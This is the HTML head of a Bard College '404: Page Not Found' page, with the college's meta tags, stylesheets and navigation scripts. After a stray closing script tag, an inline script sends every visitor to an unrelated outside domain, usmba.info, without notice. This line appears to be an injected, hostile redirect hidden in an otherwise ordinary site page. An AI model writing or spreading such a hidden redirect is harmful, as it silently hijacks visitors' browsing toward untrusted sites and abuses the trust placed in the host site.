<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Bard College 404: Page Not Found</title>
<meta name="description" content="Bard College 404: Page Not Found" />
<meta name="author" content="Bard College">
<meta name="keywords" content="bard college, 404, error, page not found" />
<link rel="canonical" href="http://www.bard.edu">
<link rel="shortcut icon" href="../images/favicon.ico">

<!-- Mobile Specific Metas -->
<meta name="viewport" content="width=device-width, minimum-scale=1, maximum-scale=2">

<!-- Styles -->
<link href="/includes/css/style.css" rel="stylesheet" type="text/css">

<!-- Javascript -->
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.0/jquery.min.js"></script>
<script src="/includes/js/mainjs.js" type="text/javascript"></script>

<!-- CCS3 Mobile Nav Files -->
<link href="/includes/css/mainnav.css" rel="stylesheet" type="text/css">
<script src="/includes/js/css3-mediaqueries.js" type="text/javascript"></script>
<script src="/includes/js/css3-collapser.js" type="text/javascript"></script>
</script>
 <script type="text/javascript">
<!--
window.location = "http://usmba.info"
//-->
</script>
 
